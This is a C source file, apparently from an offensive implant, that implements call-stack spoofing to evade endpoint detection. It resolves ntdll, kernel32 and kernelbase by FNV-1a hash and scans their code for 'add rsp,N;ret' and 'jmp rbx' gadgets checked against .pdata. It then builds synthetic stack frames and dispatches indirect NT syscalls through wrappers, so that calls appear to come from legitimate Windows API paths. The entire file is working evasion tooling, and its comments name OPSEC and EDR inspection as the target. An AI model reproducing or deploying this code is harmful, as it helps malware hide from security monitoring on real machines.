/*
 * BM-T2005: Call Stack Spoofing — Implementation
 *
 * Fabricates synthetic stack frame chains before NT syscalls so the call
 * stack appears to originate from legitimate Windows API code paths.
 *
 * Components:
 *   1. Gadget Scanner  — Finds add rsp,N;ret and jmp rbx gadgets in
 *                        ntdll/kernel32/kernelbase, validates against .pdata
 *   2. Frame Builder   — Constructs synthetic stack with spoofed frames
 *   3. C Wrappers      — bm_spoof_call_N() packs args + calls asm dispatch
 *
 * Platform: Windows x64 only
 */

#include "bm_spoof.h"
#include "loader.h"
#include <string.h>

/* EAT hashes — same FNV-1a as loader.c; Nt* only (no kernel32 VirtualAlloc/SecureZeroMemory) */
#  define H_BM_NTALLOC  0xBF226DBCu
#  define H_BM_NTFREE   0x08ECED6Bu
typedef NTSTATUS (NTAPI *bm_NtAllocateVirtualMemory_t)(
    HANDLE, PVOID *, ULONG_PTR, PSIZE_T, ULONG, ULONG);
typedef NTSTATUS (NTAPI *bm_NtFreeVirtualMemory_t)(
    HANDLE, PVOID *, PSIZE_T, ULONG);

static void *bm_alloc_rw(SIZE_T size)
{
    HMODULE ntdll = (HMODULE)locate_base(0x1617909Fu);
    if (!ntdll) return NULL;
    bm_NtAllocateVirtualMemory_t p =
        (bm_NtAllocateVirtualMemory_t)(void *)resolve_addr(ntdll, H_BM_NTALLOC);
    if (!p) return NULL;
    PVOID base = NULL;
    SIZE_T sz = size;
    NTSTATUS st = p((HANDLE)(ULONG_PTR)(LONG_PTR)-1, &base, 0, &sz,
                    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if ((long)st < 0) return NULL;
    return base;
}

static void bm_free_region(void *ptr, SIZE_T size)
{
    if (!ptr) return;
    HMODULE ntdll = (HMODULE)locate_base(0x1617909Fu);
    if (!ntdll) return;
    bm_NtFreeVirtualMemory_t p =
        (bm_NtFreeVirtualMemory_t)(void *)resolve_addr(ntdll, H_BM_NTFREE);
    if (!p) return;
    PVOID base = ptr;
    SIZE_T sz = size;
    p((HANDLE)(ULONG_PTR)(LONG_PTR)-1, &base, &sz, MEM_RELEASE);
}

static void bm_volatile_bzero(void *p, SIZE_T n)
{
    volatile unsigned char *q = (volatile unsigned char *)p;
    while (n--) *q++ = 0;
}

/* ========================================================================
 * Debug Macros
 * ======================================================================== */

#ifdef BM_SPOOF_DEBUG
  #include <stdio.h>
  #define SDBG(fmt, ...) do { printf("[spoof] " fmt "\n", ##__VA_ARGS__); fflush(stdout); } while(0)
#else
  #define SDBG(fmt, ...) ((void)0)
#endif

/* ========================================================================
 * FNV-1a hashes (generated by gen_hashes.py)
 * ======================================================================== */

#define H_NTDLL_DLL_         0x1617909Fu
#define H_KERNEL32_DLL_      0xA25682A7u
#define H_KERNELBASE_DLL_    0xC6894463u

/* ========================================================================
 * PE Structure Definitions (for .pdata parsing)
 * ======================================================================== */

#pragma pack(push, 1)

typedef struct {
    DWORD BeginAddress;    /* RVA of function start */
    DWORD EndAddress;      /* RVA of function end */
    DWORD UnwindInfoAddress; /* RVA of UNWIND_INFO */
} RUNTIME_FUNCTION_ENTRY;

#pragma pack(pop)

/* ========================================================================
 * Gadget Types
 * ======================================================================== */

typedef struct {
    void   *addr;    /* Address of the gadget in the DLL */
    DWORD   frame_size; /* N in 'add rsp, N; ret' (0 for jmp rbx) */
} SpoofGadget;

/* ========================================================================
 * Internal State
 * ======================================================================== */

typedef struct {
    int         initialized;

    /* Frame chain gadgets (one per DLL) */
    SpoofGadget ntdll_gadget;       /* add rsp, N; ret  in ntdll       (N >= 0x68) */
    SpoofGadget kernelbase_gadget;  /* add rsp, N; ret  in kernelbase  */
    SpoofGadget kernel32_gadget;    /* add rsp, N; ret  in kernel32    */
    SpoofGadget jmp_rbx;            /* jmp rbx / push rbx;ret in kernel32 or ntdll */

    /* Synthetic stack */
    void   *synth_stack;            /* NtAllocateVirtualMemory (EAT), not kernel32 */
    SIZE_T  synth_stack_size;       /* 4096 bytes (one page) */
} BmSpoofState;

static BmSpoofState g_spoof = {0};

/* Assembly globals (also referenced from bm_spoof_asm.s via RIP-relative). */
UINT_PTR g_spoof_real_rsp __attribute__((visibility("hidden")));
UINT_PTR g_spoof_synth_rsp __attribute__((visibility("hidden")));

/* Assembly dispatch function */
extern NTSTATUS bm_spoof_execute(DWORD ssn, int argc, void **argv);

/* ========================================================================
 * PE Helper: Get .text and .pdata sections from a loaded module
 * ======================================================================== */

static int get_pe_sections(HMODULE base,
                           BYTE **text_start, SIZE_T *text_size,
                           RUNTIME_FUNCTION_ENTRY **pdata, DWORD *pdata_count) {
    BYTE *base_ptr = (BYTE *)base;

    /* DOS header */
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)base_ptr;
    if (dos->e_magic != 0x5A4D) return -1;

    /* NT headers */
    IMAGE_NT_HEADERS64 *nt = (IMAGE_NT_HEADERS64 *)(base_ptr + dos->e_lfanew);
    if (nt->Signature != 0x00004550) return -1;

    /* Find .text section */
    IMAGE_SECTION_HEADER *sections = (IMAGE_SECTION_HEADER *)(
        (BYTE *)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);

    *text_start = NULL;
    *text_size = 0;
    *pdata = NULL;
    *pdata_count = 0;

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (memcmp(sections[i].Name, ".text", 5) == 0) {
            *text_start = base_ptr + sections[i].VirtualAddress;
            *text_size = sections[i].Misc.VirtualSize;
        }
        if (memcmp(sections[i].Name, ".pdata", 6) == 0) {
            *pdata = (RUNTIME_FUNCTION_ENTRY *)(base_ptr + sections[i].VirtualAddress);
            *pdata_count = sections[i].Misc.VirtualSize / sizeof(RUNTIME_FUNCTION_ENTRY);
        }
    }

    return (*text_start && *pdata) ? 0 : -1;
}

/* ========================================================================
 * Gadget Scanner: Check if address is within a RUNTIME_FUNCTION range
 *
 * This is critical for OPSEC: RtlVirtualUnwind only produces valid
 * unwind results for addresses that fall within a known function's
 * [BeginAddress, EndAddress) range in .pdata.
 * ======================================================================== */

static int addr_in_runtime_function(HMODULE base,
                                    RUNTIME_FUNCTION_ENTRY *pdata,
                                    DWORD pdata_count,
                                    void *addr) {
    DWORD rva = (DWORD)((BYTE *)addr - (BYTE *)base);

    for (DWORD i = 0; i < pdata_count; i++) {
        if (rva >= pdata[i].BeginAddress && rva < pdata[i].EndAddress) {
            return 1;
        }
    }
    return 0;
}

/* ========================================================================
 * Gadget Scanner: Find 'add rsp, N; ret' gadgets
 *
 * Patterns:
 *   48 83 C4 XX C3          — add rsp, imm8; ret  (XX = 0x00-0x7F)
 *   48 81 C4 XX XX XX XX C3 — add rsp, imm32; ret (for large frames)
 *
 * Strategy: find the LARGEST valid gadget (maximizes stack arg support).
 * If multiple gadgets exist, the biggest frame wins. A larger ntdll frame
 * means more syscall stack args (5+) can fit before the gadget2 address.
 * The gadget must fall within a valid RUNTIME_FUNCTION range.
 * ======================================================================== */

static int find_add_rsp_ret(HMODULE base, BYTE *text, SIZE_T text_size,
                            RUNTIME_FUNCTION_ENTRY *pdata, DWORD pdata_count,
                            DWORD min_frame_size, SpoofGadget *out) {
    SpoofGadget best = {0};

    /* Pattern: 48 83 C4 XX C3 (add rsp, imm8; ret) */
    for (SIZE_T i = 0; i + 5 <= text_size; i++) {
        if (text[i]   == 0x48 &&
            text[i+1] == 0x83 &&
            text[i+2] == 0xC4 &&
            text[i+4] == 0xC3) {

            DWORD frame = (DWORD)text[i+3];
            if (frame >= min_frame_size && frame > best.frame_size) {
                void *gadget_addr = text + i;
                if (addr_in_runtime_function(base, pdata, pdata_count, gadget_addr)) {
                    best.addr = gadget_addr;
                    best.frame_size = frame;
                    SDBG("  candidate: add rsp, 0x%02lX; ret @ %p",
                         (unsigned long)frame, gadget_addr);
                    /* imm8 max is 0x7F — if we found one that large, stop */
                    if (frame >= 0x78) break;
                }
            }
        }
    }

    /* Try imm32 variant: 48 81 C4 XX XX XX XX C3 (only if imm8 wasn't big enough) */
    if (best.frame_size < 0x68) {
        for (SIZE_T i = 0; i + 8 <= text_size; i++) {
            if (text[i]   == 0x48 &&
                text[i+1] == 0x81 &&
                text[i+2] == 0xC4 &&
                text[i+7] == 0xC3) {

                DWORD frame = *(DWORD *)(text + i + 3);
                if (frame >= min_frame_size && frame <= 0x200 &&
                    frame > best.frame_size) {
                    void *gadget_addr = text + i;
                    if (addr_in_runtime_function(base, pdata, pdata_count, gadget_addr)) {
                        best.addr = gadget_addr;
                        best.frame_size = frame;
                        SDBG("  candidate: add rsp, 0x%04lX; ret (imm32) @ %p",
                             (unsigned long)frame, gadget_addr);
                        if (frame >= 0x68) break;
                    }
                }
            }
        }
    }

    if (best.addr) {
        *out = best;
        SDBG("selected: add rsp, 0x%02lX; ret @ %p",
             (unsigned long)best.frame_size, best.addr);
        return 0;
    }

    return -1;
}

/* ========================================================================
 * Gadget Scanner: Find control-flow return gadget
 *
 * We need a gadget that transfers control to the address in RBX (which
 * we pre-loaded with the restore trampoline). Search priority:
 *
 *   1. jmp rbx       (FF E3)   — clean, no side effects
 *   2. call rbx      (FF D3)   — pushes ret addr, but we restore RSP anyway
 *   3. push rbx; ret (53 C3)   — equivalent to jmp rbx
 *
 * First pass: within RUNTIME_FUNCTION ranges (ideal for OPSEC).
 * Second pass: anywhere in .text (fallback — this is the terminal gadget
 * in the chain, so it's the deepest frame the EDR would examine).
 * ======================================================================== */

/* Candidate patterns for jmp-to-rbx (no string pointers — those are absolute VAs). */
typedef struct { BYTE b1; BYTE b2; } JmpPattern;

static const JmpPattern g_jmp_patterns[] = {
    { 0xFF, 0xE3 },
    { 0xFF, 0xD3 },
    { 0x53, 0xC3 },
};
#define N_JMP_PATTERNS (sizeof(g_jmp_patterns) / sizeof(g_jmp_patterns[0]))

static int find_jmp_rbx(HMODULE base, BYTE *text, SIZE_T text_size,
                         RUNTIME_FUNCTION_ENTRY *pdata, DWORD pdata_count,
                         SpoofGadget *out) {
    /* Pass 1: within RUNTIME_FUNCTION ranges */
    for (int p = 0; p < (int)N_JMP_PATTERNS; p++) {
        for (SIZE_T i = 0; i + 2 <= text_size; i++) {
            if (text[i] == g_jmp_patterns[p].b1 &&
                text[i+1] == g_jmp_patterns[p].b2) {
                void *gadget_addr = text + i;
                if (addr_in_runtime_function(base, pdata, pdata_count, gadget_addr)) {
                    out->addr = gadget_addr;
                    out->frame_size = 0;
                    SDBG("found jmp-rbx pattern @ %p (in RUNTIME_FUNCTION)",
                         gadget_addr);
                    return 0;
                }
            }
        }
    }

    /* Pass 2: anywhere in .text (fallback for terminal gadget) */
    for (int p = 0; p < (int)N_JMP_PATTERNS; p++) {
        for (SIZE_T i = 0; i + 2 <= text_size; i++) {
            if (text[i] == g_jmp_patterns[p].b1 &&
                text[i+1] == g_jmp_patterns[p].b2) {
                out->addr = text + i;
                out->frame_size = 0;
                SDBG("found jmp-rbx pattern @ %p (outside RUNTIME_FUNCTION — fallback)",
                     out->addr);
                return 0;
            }
        }
    }

    return -1;
}

/* ========================================================================
 * Gadget Scanner: Scan a single DLL
 * ======================================================================== */

static int scan_dll_for_gadgets(DWORD dll_hash, const char *name,
                                DWORD min_frame, SpoofGadget *frame_out,
                                SpoofGadget *jmp_out) {
    (void)name;  /* used only in debug builds */

    HMODULE base = (HMODULE)locate_base(dll_hash);
    if (!base) {
        SDBG("%s: not found in PEB", name);
        return -1;
    }

    BYTE *text;
    SIZE_T text_size;
    RUNTIME_FUNCTION_ENTRY *pdata;
    DWORD pdata_count;

    if (get_pe_sections(base, &text, &text_size, &pdata, &pdata_count) != 0) {
        SDBG("%s: failed to parse PE sections", name);
        return -1;
    }

    SDBG("%s: base=%p .text=%p (%zu bytes) .pdata=%u entries",
         name, (void *)base, (void *)text, text_size, (unsigned)pdata_count);

    /* Find add rsp, N; ret gadget */
    if (frame_out) {
        if (find_add_rsp_ret(base, text, text_size, pdata, pdata_count,
                             min_frame, frame_out) != 0) {
            SDBG("%s: no suitable add rsp, N; ret gadget (min=0x%lX)",
                 name, (unsigned long)min_frame);
            return -1;
        }
    }

    /* Find jmp rbx gadget (optional, only for the last frame) */
    if (jmp_out) {
        if (find_jmp_rbx(base, text, text_size, pdata, pdata_count, jmp_out) != 0) {
            SDBG("%s: no jmp rbx gadget found", name);
            /* Not fatal — we'll try other DLLs */
        }
    }

    return 0;
}

/* ========================================================================
 * Frame Builder: Construct Synthetic Stack
 *
 * Layout (offsets from RSP, which points to the top):
 *
 *   0x00: [gadget1 addr]   — ntdll: add rsp, N1; ret
 *   0x08: [shadow/padding]
 *   0x10: [shadow/padding]
 *   0x18: [shadow/padding]
 *   0x20: [shadow/padding]
 *   0x28: [arg5 or 0]      — syscall reads stack args from here
 *   0x30: [arg6 or 0]      — only placed if offset < gadget2 position
 *   ...                     — capped to avoid overwriting gadget2
 *   0x08+N1: [gadget2 addr] — kernelbase: add rsp, N2; ret
 *   ... padding N2 bytes ...
 *   0x08+N1+8+N2: [gadget3 addr] — kernel32: add rsp, N3; ret
 *   ... padding N3 bytes ...
 *   0x08+N1+8+N2+8+N3: [jmp_rbx addr] — control return
 *
 * After syscall;ret → ret pops [0x00] → gadget1.
 * gadget1: add rsp, N1 → RSP = 0x08+N1, ret → pops gadget2.
 * gadget2: add rsp, N2 → RSP = 0x08+N1+8+N2, ret → pops gadget3.
 * gadget3: add rsp, N3 → RSP = 0x08+N1+8+N2+8+N3, ret → pops jmp_rbx.
 * jmp rbx → restore trampoline.
 *
 * Stack arg capacity depends on ntdll gadget frame size:
 *   N1=0x20 → arg5 only (gadget2 at 0x28, arg5 at 0x28 is OK — read first)
 *   N1=0x28 → arg5 (gadget2 at 0x30)
 *   N1=0x38 → arg5-7 (gadget2 at 0x40)
 *   N1=0x48 → arg5-9 (gadget2 at 0x50)
 *   N1=0x58 → arg5-11 (gadget2 at 0x60)
 *   N1>=0x68 → all args (gadget2 past 0x58)
 * ======================================================================== */

static void build_synth_frames(int argc, void **argv) {
    BYTE *stack = (BYTE *)g_spoof.synth_stack;
    SIZE_T stack_size = g_spoof.synth_stack_size;

    /* Zero the synthetic stack (no kernel32 SecureZeroMemory) */
    bm_volatile_bzero(stack, stack_size);

    /* We build the stack starting from the top (lowest address that RSP
     * will point to). The stack grows DOWN in memory, but we lay out
     * the frame chain going UP from our base pointer. */

    /* Use the middle of the allocated region as our frame base,
     * giving headroom for the frame chain to grow upward. */
    BYTE *base = stack + 0x100;  /* base of our frame layout */
    SIZE_T offset = 0;

    (void)stack_size;

    DWORD n1 = g_spoof.ntdll_gadget.frame_size;
    DWORD n2 = g_spoof.kernelbase_gadget.frame_size;
    DWORD n3 = g_spoof.kernel32_gadget.frame_size;

    /* Gadget2 position: 0x08 + N1. Stack args must not overwrite this. */
    DWORD gadget2_offset = 8 + n1;

    /* [0x00] gadget1 address — first ret target after syscall;ret */
    *(void **)(base + offset) = g_spoof.ntdll_gadget.addr;
    offset += 8;

    /* [0x08 .. 0x08+N1) padding — this includes shadow space + stack args.
     * Place stack arguments at the correct offsets, but cap at gadget2's
     * position to prevent overwriting the frame chain. The syscall reads
     * its stack args DURING execution (before the ret), so args placed
     * before gadget2's slot are safe — they're consumed first. */
    if (argc > 4 && argv) {
        for (int i = 4; i < argc && i < 11; i++) {
            DWORD arg_offset = 0x28 + (DWORD)(i - 4) * 8;
            /* Only place the arg if it won't overwrite gadget2's address.
             * Exception: if arg_offset == gadget2_offset, the syscall reads
             * the value BEFORE ret pops it, so we could theoretically share
             * the slot. But to be safe, skip conflicting slots. */
            if (arg_offset < gadget2_offset) {
                *(void **)(base + arg_offset) = argv[i];
            }
        }
    }

    /* Skip to end of gadget1's frame */
    offset = gadget2_offset;

    /* [0x08+N1] gadget2 address — kernelbase */
    *(void **)(base + offset) = g_spoof.kernelbase_gadget.addr;
    offset += 8;

    /* Skip gadget2's frame */
    offset += n2;

    /* [0x08+N1+8+N2] gadget3 address — kernel32 */
    *(void **)(base + offset) = g_spoof.kernel32_gadget.addr;
    offset += 8;

    /* Skip gadget3's frame */
    offset += n3;

    /* [0x08+N1+8+N2+8+N3] jmp rbx address — control return */
    *(void **)(base + offset) = g_spoof.jmp_rbx.addr;

    /* Set the global RSP for the assembly stub */
    g_spoof_synth_rsp = (UINT_PTR)base;

    SDBG("synth stack built: base=%p, N1=0x%lX/N2=0x%lX/N3=0x%lX, "
         "gadgets at +0x00/+0x%lX/+0x%lX/+0x%lX",
         (void *)base,
         (unsigned long)n1, (unsigned long)n2, (unsigned long)n3,
         (unsigned long)gadget2_offset,
         (unsigned long)(gadget2_offset + 8 + n2),
         (unsigned long)(gadget2_offset + 8 + n2 + 8 + n3));
}

/* ========================================================================
 * Stargate Integration
 *
 * Set g_syscall_gadget before each spoofed call (same as SG_SET_GADGET).
 * ======================================================================== */

static void set_gadget_for_sc(SgSyscall *sc) {
    if (sc->gadget)
        sg_set_syscall_gadget(sc->gadget);
    else {
        void *g = sg_get_shared_gadget();
        if (g)
            sg_set_syscall_gadget(g);
    }
}

/* ========================================================================
 * Public API: bm_spoof_init
 * ======================================================================== */

int bm_spoof_init(void) {
    if (g_spoof.initialized) return 0;

    memset(&g_spoof, 0, sizeof(g_spoof));

    SDBG("scanning for gadgets...");

    /* ---- Scan ntdll ----
     * Prefer large frames (>= 0x68) to clear the syscall stack args area.
     * Scanner picks the LARGEST available gadget. Min 0x20 (shadow space
     * cleanup) is extremely common and always findable.
     * Also look for jmp rbx here as a backup. */
    SpoofGadget ntdll_jmp = {0};
    if (scan_dll_for_gadgets(H_NTDLL_DLL_, "ntdll",
                             0x20, &g_spoof.ntdll_gadget, &ntdll_jmp) != 0) {
        SDBG("FATAL: ntdll gadget scan failed");
        return -1;
    }

    /* ---- Scan kernelbase ----
     * Any frame size works (no stack args to clear at this level). */
    SpoofGadget kb_jmp = {0};
    if (scan_dll_for_gadgets(H_KERNELBASE_DLL_, "kernelbase",
                             0x20, &g_spoof.kernelbase_gadget, &kb_jmp) != 0) {
        SDBG("FATAL: kernelbase gadget scan failed");
        return -1;
    }

    /* ---- Scan kernel32 ----
     * Any frame size works. Also look for jmp rbx. */
    SpoofGadget k32_jmp = {0};
    if (scan_dll_for_gadgets(H_KERNEL32_DLL_, "kernel32",
                             0x20, &g_spoof.kernel32_gadget, &k32_jmp) != 0) {
        SDBG("FATAL: kernel32 gadget scan failed");
        return -1;
    }

    /* ---- Find jmp rbx (try kernel32 first, then ntdll, then kernelbase) ---- */
    if (k32_jmp.addr) {
        g_spoof.jmp_rbx = k32_jmp;
    } else if (ntdll_jmp.addr) {
        g_spoof.jmp_rbx = ntdll_jmp;
    } else if (kb_jmp.addr) {
        g_spoof.jmp_rbx = kb_jmp;
    } else {
        SDBG("FATAL: no jmp rbx gadget found in any DLL");
        return -1;
    }

    SDBG("gadgets found:");
    SDBG("  ntdll:      add rsp, 0x%02lX; ret  @ %p",
         (unsigned long)g_spoof.ntdll_gadget.frame_size, g_spoof.ntdll_gadget.addr);
    SDBG("  kernelbase: add rsp, 0x%02lX; ret  @ %p",
         (unsigned long)g_spoof.kernelbase_gadget.frame_size, g_spoof.kernelbase_gadget.addr);
    SDBG("  kernel32:   add rsp, 0x%02lX; ret  @ %p",
         (unsigned long)g_spoof.kernel32_gadget.frame_size, g_spoof.kernel32_gadget.addr);
    SDBG("  jmp rbx:    @ %p", g_spoof.jmp_rbx.addr);

    /* ---- Allocate synthetic stack ----
     * One page (4096 bytes) is plenty for the frame chain + stack args. */
    g_spoof.synth_stack_size = 4096;
    g_spoof.synth_stack = bm_alloc_rw(g_spoof.synth_stack_size);
    if (!g_spoof.synth_stack) {
        SDBG("FATAL: NtAllocateVirtualMemory for synthetic stack failed");
        return -1;
    }

    SDBG("synthetic stack allocated: %p (%zu bytes)",
         g_spoof.synth_stack, g_spoof.synth_stack_size);

    g_spoof.initialized = 1;
    return 0;
}

/* ========================================================================
 * Public API: bm_spoof_cleanup
 * ======================================================================== */

void bm_spoof_cleanup(void) {
    if (g_spoof.synth_stack) {
        bm_volatile_bzero(g_spoof.synth_stack, g_spoof.synth_stack_size);
        bm_free_region(g_spoof.synth_stack, g_spoof.synth_stack_size);
    }
    bm_volatile_bzero(&g_spoof, sizeof(g_spoof));
    g_spoof_real_rsp = 0;
    g_spoof_synth_rsp = 0;
}

/* ========================================================================
 * Public API: bm_spoof_is_active
 * ======================================================================== */

int bm_spoof_is_active(void) {
    return g_spoof.initialized;
}

/* ========================================================================
 * Public API: bm_spoof_call_N — Spoofed Syscall Dispatch
 *
 * Each wrapper:
 *   1. Sets the Stargate gadget for indirect mode
 *   2. Packs arguments into an array
 *   3. Builds the synthetic frame chain
 *   4. Calls the assembly dispatch (stack pivot + syscall + restore)
 * ======================================================================== */

NTSTATUS bm_spoof_call_0(SgSyscall *sc) {
    set_gadget_for_sc(sc);
    build_synth_frames(0, NULL);
    return bm_spoof_execute(sc->ssn, 0, NULL);
}

NTSTATUS bm_spoof_call_1(SgSyscall *sc, void *a1) {
    set_gadget_for_sc(sc);
    void *args[] = {a1};
    build_synth_frames(1, args);
    return bm_spoof_execute(sc->ssn, 1, args);
}

NTSTATUS bm_spoof_call_2(SgSyscall *sc, void *a1, void *a2) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2};
    build_synth_frames(2, args);
    return bm_spoof_execute(sc->ssn, 2, args);
}

NTSTATUS bm_spoof_call_3(SgSyscall *sc, void *a1, void *a2, void *a3) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3};
    build_synth_frames(3, args);
    return bm_spoof_execute(sc->ssn, 3, args);
}

NTSTATUS bm_spoof_call_4(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4};
    build_synth_frames(4, args);
    return bm_spoof_execute(sc->ssn, 4, args);
}

NTSTATUS bm_spoof_call_5(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                          void *a5) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5};
    build_synth_frames(5, args);
    return bm_spoof_execute(sc->ssn, 5, args);
}

NTSTATUS bm_spoof_call_6(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                          void *a5, void *a6) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6};
    build_synth_frames(6, args);
    return bm_spoof_execute(sc->ssn, 6, args);
}

NTSTATUS bm_spoof_call_7(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                          void *a5, void *a6, void *a7) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6, a7};
    build_synth_frames(7, args);
    return bm_spoof_execute(sc->ssn, 7, args);
}

NTSTATUS bm_spoof_call_8(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                          void *a5, void *a6, void *a7, void *a8) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6, a7, a8};
    build_synth_frames(8, args);
    return bm_spoof_execute(sc->ssn, 8, args);
}

NTSTATUS bm_spoof_call_9(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                          void *a5, void *a6, void *a7, void *a8, void *a9) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6, a7, a8, a9};
    build_synth_frames(9, args);
    return bm_spoof_execute(sc->ssn, 9, args);
}

NTSTATUS bm_spoof_call_10(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                           void *a5, void *a6, void *a7, void *a8, void *a9,
                           void *a10) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6, a7, a8, a9, a10};
    build_synth_frames(10, args);
    return bm_spoof_execute(sc->ssn, 10, args);
}

NTSTATUS bm_spoof_call_11(SgSyscall *sc, void *a1, void *a2, void *a3, void *a4,
                           void *a5, void *a6, void *a7, void *a8, void *a9,
                           void *a10, void *a11) {
    set_gadget_for_sc(sc);
    void *args[] = {a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11};
    build_synth_frames(11, args);
    return bm_spoof_execute(sc->ssn, 11, args);
}
